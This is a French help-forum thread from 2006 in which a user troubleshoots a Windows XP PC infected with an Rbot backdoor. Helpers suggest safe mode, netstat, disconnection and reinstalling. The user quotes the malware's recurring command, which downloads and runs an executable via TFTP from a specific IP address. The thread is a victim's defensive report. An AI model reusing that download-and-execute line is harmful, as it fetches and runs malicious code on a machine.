Twitter iPhone pliant OnePlus 11 PS5 Disney+ Orange Livebox Windows 11

Virus ou bug windows update ?

16 réponses
Avatar
culpa
Bonjour,

voici les sympt=F4mes :

acc=E8s =E0 internet impossible (~pas de r=E9seau)

dans la base de registre
run : uifvfg.exe libell=E9 "Windows System Update"
services : uifvfg.exe libell=E9 "Windows System Update"

dans le gestionnaire des t=E2ches > processus
uifvfg.exe

si je termine le processus, miracle acc=E8s =E0 internet !!
j'efface toutes les entr=E9es de la base de registre, je red=E9marre le
PC

les trois (base de registre + gest. de t=E2che ) sont =E0 nouveau l=E0 !!!

mais Kaspersky, avast, anti-vir, etc (5 antivirus + antivirus en ligne)
n'ont trouv=E9 quoi que ce soit :(

Une id=E9e ?

Merci d'avance.

10 réponses

1 2
Avatar
culpa

On 18 Sep 2006 02:12:18 -0700, wrote:

les trois (base de registre + gest. de tâche ) sont à nouveau là ! !!


Essayez de démarrer en mode sans échec et allez voir sur votre DD s'il
est possible de supprimer le exe fautif.
Le mieux serait de trouver ce qui le "lance"...



Ahhhhh merci !
Effectivement en le supprimant "à la manière forte" les antivirus
arrivent enfin à le détecter !
Backdoor.Win32.Rbot.bjd !!

avant ils passaient dessus sans le voir
C'est nul un antivirus :(


Avatar
Nina Popravka
On Tue, 19 Sep 2006 12:17:19 +0200, Cyrius
wrote:

Si un virus est passé, peu importe la raison, la seule façon de le
supprimer correctement est de le faire quand il n'est pas actif...
d'où le scan en mode sans échec.
C'est vrai, mais c'est quand même assez curieux qu'aucun anti-virus

n'ait été capable de voir l'intrus, quitte à déclarer qu'il ne pouvait
rien faire, et proposer un scan au prochain démarrage...
--
Nina

Avatar
culpa

On Tue, 19 Sep 2006 12:17:19 +0200, Cyrius
wrote:

Si un virus est passé, peu importe la raison, la seule façon de le
supprimer correctement est de le faire quand il n'est pas actif...
d'où le scan en mode sans échec.
C'est vrai, mais c'est quand même assez curieux qu'aucun anti-virus

n'ait été capable de voir l'intrus, quitte à déclarer qu'il ne po uvait
rien faire, et proposer un scan au prochain démarrage...
--
Nina



Au secours !!!
Il n'a pas l'air d'être parti...
Toujours aucune détection par les antivirus... (mis à part celle dont
j'avais parlé ci-dessus)

mais le pc fait des truc tout seul régulièrement :

la fenêtre executer un programme s'ouvre et marque "cmd.exe"

tftp -i 82.253.157.4 GET msqarsm.exe
msqarsm.exe
exit


On fait quoi dans ces cas là ? ôO


Avatar
Nina Popravka
On 19 Sep 2006 05:28:51 -0700, wrote:

tftp -i 82.253.157.4 GET msqarsm.exe
msqarsm.exe
exit


On fait quoi dans ces cas là ? ôO
On se dit qu'on a gagné un très joli bot :-)))))

Et on cherche où il est.
--
Nina


Avatar
Pascal Hambourg
Salut,


mais le pc fait des truc tout seul régulièrement :

la fenêtre executer un programme s'ouvre et marque "cmd.exe"

tftp -i 82.253.157.4 GET msqarsm.exe
msqarsm.exe
exit


On fait quoi dans ces cas là ? ôO


On commence par déconnecter *physiquement* la machine du réseau ou
d'internet. Ensuite, on peut éventuellement prévenir Free/Proxad que son
client qui a l'adresse ci-dessus héberge des trucs douteux sur un
serveur TFTP.


Avatar
culpa

On se dit qu'on a gagné un très joli bot :-)))))
Et on cherche où il est.
--
Nina


Merci... voilà qui m'avance grandement :(

Comme déjà dit
KasperSky > Aucun objet dangeureux trouvé.
Secuser > Que dalle
Panda online > Rien
Avast > Nada
Antivir "parapluie" > nothing

Dans la base de registre, plus rien de "suspect"...

Et pourtant ce truc s'execute toutes les n minutes !!!

Une autre idée ?

=====
Logfile of HijackThis v1.99.1
Scan saved at 15:04:26, on 19/09/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:WINDOWSSystem32smss.exe
C:WINDOWSsystem32winlogon.exe
C:WINDOWSsystem32services.exe
C:WINDOWSsystem32lsass.exe
C:WINDOWSsystem32svchost.exe
C:WINDOWSSystem32svchost.exe
C:WINDOWSsystem32spoolsv.exe
C:WINDOWSExplorer.EXE
C:Program FilesATI TechnologiesATI Control Panelatiptaxx.exe
C:WINDOWSmHotkey.exe
C:WINDOWSCNYHKey.exe
C:WINDOWSsystem32ctfmon.exe
C:Program FilesFichiers communsMicrosoft SharedVS7Debugmdm.exe
C:WINDOWSSystem32svchost.exe
C:Program FilesInternet Exploreriexplore.exe
C:Documents and SettingsCaroleBureauHijackThis.exe

O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}
- C:Program FilesAdobeAcrobat 6.0ReaderActiveXAcroIEHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -
C:Program FilesJavajre1.5.0_06binssv.dll
O4 - HKLM..Run: [ATIPTA] C:Program FilesATI TechnologiesATI
Control Panelatiptaxx.exe
O4 - HKLM..Run: [Cmaudio] RunDll32 cmicnfg.cpl,CMICtrlWnd
O4 - HKLM..Run: [CHotkey] mHotkey.exe
O4 - HKLM..Run: [ledpointer] CNYHKey.exe
O4 - HKLM..Run: [KAVPersonal50] "C:Program FilesKaspersky
LabKaspersky Anti-Virus Personal Prokav.exe" /minimize
O4 - HKCU..Run: [ctfmon.exe] C:WINDOWSsystem32ctfmon.exe
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} -
C:Program FilesJavajre1.5.0_06binssv.dll
O9 - Extra 'Tools' menuitem: Console Java (Sun) -
{08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:Program
FilesJavajre1.5.0_06binssv.dll
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} -
C:WINDOWSSystem32Shdocvw.dll
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} -
C:Program FilesMessengermsmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger -
{FB5F1910-F110-11d2-BB9E-00C04F795683} - C:Program
FilesMessengermsmsgs.exe
O16 - DPF: {0EB0E74A-2A76-4AB3-A7FB-9BD8C29F7F75} (CKAVWebScan Object)
- http://webscanner.kaspersky.fr/kavwebscan_unicode.cab
O16 - DPF: {56336BCB-3D8A-11D6-A00B-0050DA18DE71} (RdxIE Class) -
http://software-dl.real.com/2821fd5ae350f9e3a216/netzip/RdxIE601_fr.cab
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer
Class) - http://www.pandasoftware.com/activescan/as5free/asinst.cab
O18 - Protocol: livecall - {828030A1-22C1-4009-854F-8E305202313F} -
C:PROGRA~1MSNMES~1MSGRAP~1.DLL
O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} -
C:PROGRA~1MSNMES~1MSGRAP~1.DLL
O20 - Winlogon Notify: WgaLogon - C:WINDOWSSYSTEM32WgaLogon.dll
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision
Corporation - C:Program FilesFichiers
communsInstallShieldDriver11Intel 32IDriverT.exe
O23 - Service: iPodService - Apple Computer, Inc. - C:Program
FilesiPodbiniPodService.exe
O23 - Service: Kaspersky Anti-Virus Service (kavsvc) - Kaspersky Lab -
C:Program FilesKaspersky LabKaspersky Anti-Virus Personal
Prokavsvc.exe
O23 - Service: X10 Device Network Service (x10nets) - X10 -
C:PROGRA~1COMMON~1X10Commonx10nets.exe

Avatar
Nina Popravka
On 19 Sep 2006 06:08:19 -0700, wrote:

Et pourtant ce truc s'execute toutes les n minutes !!!
Ce truc communique...

Donc un netstat -b vous donnera le nom du process qui communique...
--
Nina

Avatar
Nina Popravka
On Tue, 19 Sep 2006 15:05:23 +0200, Pascal Hambourg
wrote:

Ensuite, on peut éventuellement prévenir Free/Proxad que son
client qui a l'adresse ci-dessus héberge des trucs douteux sur un
serveur TFTP.
Y en a tellement que j'ai abandonné...

Tu crois que ça sert à quelque chose ?
--
Nina

Avatar
culpa

On commence par déconnecter *physiquement* la machine du réseau ou
d'internet.


C'est ce que j'ai fait, raison pour laquelle j'ai pu voir la ligne de
commande...(tftp ->"Délai dépassé")

mais le "truc" continue de tourner, et reste introuvable :(

Un formatage total + réinstallation peut résoudre le problème ?
Ou je risque d'attraper un truc à la première connexion internet pour
télécharger un anti-virus ou mettre à jour mon Xp via windows
upadate ?

Merci d'avance de vos conseils.

Avatar
Nina Popravka
On 19 Sep 2006 06:17:20 -0700, wrote:

Un formatage total + réinstallation peut résoudre le problème ?
Certainement :-)))))

Ou je risque d'attraper un truc à la première connexion internet pour
télécharger un anti-virus ou mettre à jour mon Xp via windows
upadate ?
Oui mais non.

Si vous êtes derrière un routeur, aucun souci.
En connexion directe, c'est évidemment plus litigieux.
Toutefois je ne connais pas de bots dans le genre du vôtre qui saute
tout seul sur la machine, tous ceux que j'ai croisés demandaient une
intervention du non-cerveau de l'utilisateur.
--
Nina

1 2